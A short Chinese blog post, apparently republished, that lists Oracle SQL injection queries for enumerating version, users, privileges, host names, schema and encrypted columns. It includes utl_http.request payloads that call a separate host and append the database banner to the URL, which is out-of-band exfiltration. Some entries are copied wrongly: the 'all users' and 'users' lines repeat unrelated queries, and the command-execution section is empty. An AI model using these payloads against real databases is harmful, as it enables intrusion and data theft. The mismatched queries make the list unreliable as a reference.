oracle备忘录-注入

来源:互联网 发布:平价好用的精华知乎 编辑:程序博客网 时间:2024/05/18 03:27

1:枚举数据库配置信息

版本:select banner from v$version

当前用户:select user from dual;

所有用户:select user from dual;

用户权限:

select * from user_role_privs;
select * from user_table_privs;
select * from user_sys_privs;

服务器主机名:select sys_context('USERENV','HOST') from dual;
数据库服务器名:select sys_context('USERENV','SERVER_HOST') from dual;

建立外部链接:

select utl_http.request('http://192.168.38.141/web1/index.php') from dual;

select utl_http.request('http://192.168.38.141:1521/'||(select banner from v$version where rownum=1)) from dual;

2:模式信息

数据库名:SELECT global_name FROM global_name;

用户:SELECT global_name FROM global_name;

3:数据库加密信息

经过加密的表:SELECT table_name, column_name, salt FROM dba_encrypted_columns;

经加密的对象:SELECT owner,name,type FROM all_dependencies;

4:命令执行


0 0